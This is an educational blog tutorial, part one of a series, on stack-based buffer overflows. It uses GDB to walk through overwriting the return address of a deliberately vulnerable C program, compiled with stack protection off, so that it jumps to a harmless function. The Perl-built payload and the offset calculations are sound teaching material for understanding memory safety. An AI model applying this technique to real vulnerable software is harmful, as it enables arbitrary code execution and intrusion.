On Stack Smashing, Part One

Stack smashing is accomplished by exploiting a running process by injecting executable code or taking control of the instruction pointer in order to have it do something it wasn’t designed to do. This is usually accomplished by executing a stack-based buffer overflow, or overrun, whereby a contiguous area of memory is filled up and overflowed into the adjacent memory locations.

This is also known as arbitrary code execution.

There have been security measures put in place both at the hardware (NX bit) and software (ASLR, stack canaries) layers to prevent these, but any subscriber to an OS bug mailing list will know that these exploits still happen frequently.

I posit that taking the time to understand how and why these exploits work is an excellent educational experience, whether one codes in “low-level” language such as C/C++ or a high-level interpreted language such as Python or JavaScript.

For example, to implement a buffer overflow attack, it is necessary to have at least a basic understanding of the following (in no specific order):

memory layout
assembly
C
GDB

In this article, I’m going to assume a certain familiarity with the basics of the aforementioned, so if you are completely new to any one of them, I suggest finding a tutorial to get you up to speed.

Let’s get started.

Stack-based Buffer Overflow Example

Here’s a simple and contrived example, which is close to the canonical example you’ll see on most websites that demonstrate the technique:

#include <stdio.h>
#include <string.h>

void foo(char *s) {
    char buf[10];
    strcpy(buf, s);
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    foo(argv[1]);
    return 0;
}

The idea is to give the program input that is larger than the length that the buf buffer expects. By overwriting adjacent memory, a clever hacker can gain control of the process and possibly even the machine.

For example, since there is no bounds checking, the call to strcpy can overflow the buf buffer if the function parameter s is larger than 10 bytes. Let’s test it.

The strcpy man page warns that the function is susceptible to a buffer overrun and that the recommended function call is strncpy, where the programmer specifies the length of the copy.

$ gcc -o cat_pictures cat_pictures.c
$ ./cat_pictures foobar
foobar
$ ./cat_pictures AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

You can see that the character array foobar, being six bytes in length, is printed to stdout without a complaint. The second example, however, is a different story. The “string” (there are no strings in C) is larger than the buffer, and C will continue to happily write the characters into the adjacent memory, corrupting it and causing a runtime error.

Let’s compile that again with a flag to turn off the memory protection:

$ gcc -fno-stack-protector -o cat_pictures cat_pictures.c
$ ./cat_pictures AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

We now just get a segfault. That’s better.

The stack smashing detected error is because the x86 64-bit architecture on my Linux machine will protect the stack from buffer overruns by default. You shouldn’t need the -fno-stack-protector flag when compiling on a 32-bit machine.

So, what is happening here? Let’s recompile for debugger symbol support and run it in a GDB session:

$ gcc -ggdb3 -fno-stack-protector -o cat_pictures cat_pictures.c
$ gdb cat_pictures
Reading symbols from cat_pictures...done.
(gdb) l 1
1       #include <stdio.h>
2       #include <string.h>
3
4       void foo(char *s) {
5           char buf[10];
6           strcpy(buf, s);
7           printf("%s\n", buf);
8       }
9
10      int main(int argc, char **argv) {
(gdb)
11          foo(argv[1]);
12          return 0;
13      }
14
(gdb) b 5
Breakpoint 1 at 0x1151: file cat_pictures.c, line 6.
(gdb) b 7
Breakpoint 2 at 0x1164: file cat_pictures.c, line 7.
(gdb) r foobar
Starting program: /home/btoll/cat_pictures foobar

Breakpoint 1, foo (s=0x7fffffffe304 "foobar") at cat_pictures.c:6
6           strcpy(buf, s);
(gdb)

Ok, here I’ve listed the program, set two breakpoints (one before the character array is copied into the buffer and one after) and ran the program with the parameter “foobar”.

Let’s look at the memory layout. I’ll dump the first 16 words (64 bytes) starting from the stack pointer. This displays the memory going down the stack towards the higher memory addresses. I know, that’s confusing and unintuitive, but the stack grows up, not down.:

(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb)

Where is the base pointer pointing?

(gdb) x $rbp
0x7fffffffde60: 0xffffde80
(gdb)

The 64-bit architecture moves the caller’s function parameters into CPU registers, and we can find ours in the rax register:

(gdb) x/s $rax
0x7fffffffe304: "foobar"
(gdb)

And the location and value of buf:

(gdb) x buf
0x7fffffffde56: 0x00000000
(gdb) x/s buf
0x7fffffffde56: ""
(gdb)

The compiler allocated 10 bytes for the buffer:

(gdb) p $rbp-buf
$1 = 10
(gdb)

Let’s look again at this block of memory with the important bytes highlighted:

(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb)

red - stack pointer (rsp)
green - base pointer (rbp)
brown - return value
yellow - buf local variable

The 18 bytes between the stack pointer and buf are noise, as are the 4 bytes located between the base pointer and the return value.

See my post On Debugging with GDB if you’re confused about any of this.

How do I know that the value pointed at by address 0x7fffffffde68 is the return value? I simply disassembled the main function and looked at the address right after the call to foo, which the compiler would have pushed onto the stack prior to the function prologue as the part of the new stack frame:

(gdb) disass main
Dump of assembler code for function main:
   0x0000555555555173 <+0>:     push   rbp
   0x0000555555555174 <+1>:     mov    rbp,rsp
   0x0000555555555177 <+4>:     sub    rsp,0x10
   0x000055555555517b <+8>:     mov    DWORD PTR [rbp-0x4],edi
   0x000055555555517e <+11>:    mov    QWORD PTR [rbp-0x10],rsi
   0x0000555555555182 <+15>:    mov    rax,QWORD PTR [rbp-0x10]
   0x0000555555555186 <+19>:    add    rax,0x8
   0x000055555555518a <+23>:    mov    rax,QWORD PTR [rax]
   0x000055555555518d <+26>:    mov    rdi,rax
   0x0000555555555190 <+29>:    call   0x555555555145 
   0x0000555555555195 <+34>:    mov    eax,0x0
   0x000055555555519a <+39>:    leave
   0x000055555555519b <+40>:    ret
End of assembler dump.
(gdb)

Now, let’s continue onto the second breakpoint:

(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe303 "foobar") at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb)

Our buffer has now been copied into, we inspect the same block of memory again and we exit the program:

(gdb) x/s buf
0x7fffffffde56: "foobar"
(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x6f667fff      0x7261626f      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb) c
Continuing.
foobar
[Inferior 1 (process 26468) exited normally]
(gdb)

The highlighted byte furthest to the right is the null byte added by strcpy. Essentially, “foobar” + “\0”.

Ok, now let’s make it more interesting by attempting to copy in more than 10 bytes:

(gdb) r AAAAAAAAAAAAAAAAA
Starting program: /home/btoll/cat_pictures AAAAAAAAAAAAAAAAA

Breakpoint 1, foo (s=0x7fffffffe2f8 'A' ) at cat_pictures.c:6
6           strcpy(buf, s);
(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe2f8 'A' ) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f8      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x00414141      0x55555195      0x00005555
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb) i r rbp
rbp            0x7fffffffde50      0x7fffffffde50
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAA

Program received signal SIGBUS, Bus error.
main (argc=, argv=) at cat_pictures.c:13
13      }
(gdb)

After continuing to the second breakpoint, we can see that we’ve overrun the size of our buffer and spilled into the adjacent memory. The program prints, but is unable to exit gracefully.

Notice, however, that we haven’t actually rewritten the return value (highlighted in brown), which is the objective of a buffer overflow exploit. To do so, we’d need to run the program with a longer input “string”. But how long?

Well, from out previous testing, we know that buf starts at address 0x7fffffffde56 and the return value starts at address 0x7fffffffde68. So:

(gdb) p 0x7fffffffde68-0x7fffffffde56
$2 = 18
(gdb)

Let’s try it with a buffer length of 18 bytes and clear the first breakpoint:

(gdb) r $(perl -e 'print "A"x18')
Starting program: /home/btoll/cat_pictures $(perl -e 'print "A"x18')

Breakpoint 1, foo (s=0x7fffffffe2f7 'A' ) at cat_pictures.c:6
6           strcpy(buf, s);
(gdb) clear
Deleted breakpoint 1
(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe2f7 'A' ) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f7      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x41414141      0x55555100      0x00005555
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb)

Wait a minute, what happened to the return address? We gave it a character array of 18 bytes which should align itself to the left of the return address, which should contain the value 0x55555195. (again, the location of the next instruction in main after the call to foo). Instead, it’s pointing to the address at 0x55555100. Wtf?

Again, recall that any character array must end with a null byte. strcpy will automatically add that null byte when it copies from source to destination buffer. If we look closer, we see that that’s exactly what happened: the 18 bytes + the 1 null byte.

So, we just need to add another 4 bytes to account for the whole memory address:

(gdb) r $(perl -e 'print "A"x22')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/btoll/cat_pictures $(perl -e 'print "A"x22')

Breakpoint 2, foo (s=0x7fffffffe2f3 'A' ) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f3      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x41414141      0x41414141      0x00005500
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000550041414141 in ?? ()
(gdb)

Now that we’ve increased our input size, we can see that it’s correctly overflowing the entire return value.

Let’s now look at preparing an exploit that will actually do something, instead of just crashing the program.

By the way, why am I using Perl? Obviously, you can use any programming language you like that’s installed on the machine, but most Linux distros will have Perl installed by default, and there are environments where it could be the only scripting language installed. Deal with it.

Controlling the Return Value

Now that we’ve seen how to overflow a buffer through to the return value, let’s actually have it do something (somewhat) interesting. Let’s create a new function, and instead of having the program call it directly, we’ll call it indirectly by overflowing the return value with its memory address.

First, we’ll create some shell code:

$ echo and now you do what they told ya | hexdump -v -e '"\\x" 1/1 "%02x"' ; echo

Note that there isn’t anything malicious here, it’s just encoding the string “and now you do what they told ya” into hex and adding the return and newline control characters. The -e flag allows us to pass a format string to hexdump.

The output:

\x61\x6e\x64\x20\x6e\x6f\x77\x20\x79\x6f\x75\x20\x64\x6f\x20\x77\x68\x61\x74\x20\x74\x68\x65\x79\x20\x74\x6f\x6c\x64\x20\x79\x61\x0a

And the updated cat_pictures.c script:

#include <stdio.h>
#include <string.h>

void ratm() {
    printf("\x61\x6e\x64\x20\x6e\x6f\x77\x20\x79\x6f\x75\x20\x64\x6f\x20\x77\x68\x61\x74\x20\x74\x68\x65\x79\x20\x74\x6f\x6c\x64\x20\x79\x61\x0a");
}

void foo(char *s) {
    char buf[10];
    strcpy(buf, s);
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    foo(argv[1]);
    return 0;
}

Recompile and run the program in GDB, breaking at the beginning of the main function. This will allow us to determine the address of the new ratm function:

$ gdb cat_pictures
Reading symbols from cat_pictures...done.
(gdb) b main
Breakpoint 1 at 0x1195: file cat_pictures.c, line 15.
(gdb) r
Starting program: /home/btoll/cat_pictures

Breakpoint 1, main (argc=1, argv=0x7fffffffdf78) at cat_pictures.c:15
15          foo(argv[1]);
(gdb) x ratm
0x555555555145 :  0xe5894855
(gdb)

Append the address 0x555555555145 to our input and call the program again (this time from the command line):

$ ./cat_pictures $(perl -e 'print "A"x18 . "\x45\x51\x55\x55\x55\x55"')
AAAAAAAAAAAAAAAAAAEQUUUU
and now you do what they told ya
Segmentation fault (core dumped)

Works. Weeeeeeeeeeeeeeeeeeeeeeeee

Let’s look at another example. In the dog_adoption.c program, we have a contrived example, but one that illuminates further how the return value can be controlled to do clever things. Here, it’s using a pointer to overwrite the return address with another which will skip over the rest of the if block in main and allow us to adopt another dog:

dog_adoption.c

#include <stdio.h>

int adoption() {
    int current = 4;
    int *ret;

    ret = &current + 5;     [1]
    *ret += 24; 	    [2]

    return current;
}

int main() {
    if (adoption() > 2) {
        printf("i'm sorry, you cannot get another dog\n");
        return 0;
    }

    printf("get another dog\n");
}

[1] Pointer arithmetic to “forward” the address to that of the return value.

This is accomplished by inspecting the memory addresses of adoption’s local variables. For example:

  (gdb) x/16xw $rbp-48
  0x7fffffffde10: 0x00000000      0x00000000      0x555551e5      0x00005555
  0x7fffffffde20: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
  0x7fffffffde30: 0x555551a0      0x00000004      0xffffde48      0x00007fff
  0x7fffffffde40: 0xffffde50      0x00007fff      0x55555186      0x00005555
  (gdb) x/xw &current
  0x7fffffffde34: 0x00000004
  (gdb) x/xw &ret
  0x7fffffffde38: 0xffffde48
  (gdb) x/xw $rbp
  0x7fffffffde40: 0xffffde50
  (gdb)

Here, we’re dumping the first 48 bytes after the base pointer. 64-bit x86 processors have an optimization that doesn’t set the stack pointer unless specified, so that’s why I’m not dumping the memory using the rsp as the offset as before.
The return address is located at address 0x7fffffffde48, so we simply find the difference between the its address and that of current and divide by 4, since we’re dealing with ints:
```
  (gdb) p (0x7fffffffde48-0x7fffffffde34) / sizeof(int)
  $3 = 5
  (gdb)
```

[2] After disassemblying main, adding the bytes to the value of ret of the instruction we want to execute, jumping over the ones we don’t.

We’ll disassemble main and again do some basic arithmetic:

  (gdb) disass main
  Dump of assembler code for function main:
     0x0000555555555160 <+0>:     push   rbp
     0x0000555555555161 <+1>:     mov    rbp,rsp
     0x0000555555555164 <+4>:     mov    eax,0x0
     0x0000555555555169 <+9>:     call   0x555555555135 <adoption>
     0x000055555555516e <+14>:    cmp    eax,0x2
     0x0000555555555171 <+17>:    jle    0x555555555186 <main+38>
     0x0000555555555173 <+19>:    lea    rdi,[rip+0xe8e]        # 0x555555556008
     0x000055555555517a <+26>:    call   0x555555555030 <puts@plt>
     0x000055555555517f <+31>:    mov    eax,0x0
     0x0000555555555184 <+36>:    jmp    0x555555555197 <main+55>
     0x0000555555555186 <+38>:    lea    rdi,[rip+0xea1]        # 0x55555555602e
     0x000055555555518d <+45>:    call   0x555555555030 <puts@plt>
     0x0000555555555192 <+50>:    mov    eax,0x0
     0x0000555555555197 <+55>:    pop    rbp
     0x0000555555555198 <+56>:    ret
  End of assembler dump.
  (gdb) p 0x0000555555555186-0x000055555555516e
  $12 = 24
  (gdb)

Again, here we’re just finding the difference between the address we want to jump to and the address of the return value.

Back on the command line, we’ll see if it worked:

$ ./dog_adoption
get another dog

Kool moe dee.

Conclusion

This post is getting rather long, so I’m going to break it up into two pieces.

In the second half, I’ll be showing how to exploit the cat_pictures.c program in a more useful, albeit somewhat contrived, way.

Stack-based Buffer Overflow Example

Controlling the Return Value

Conclusion

References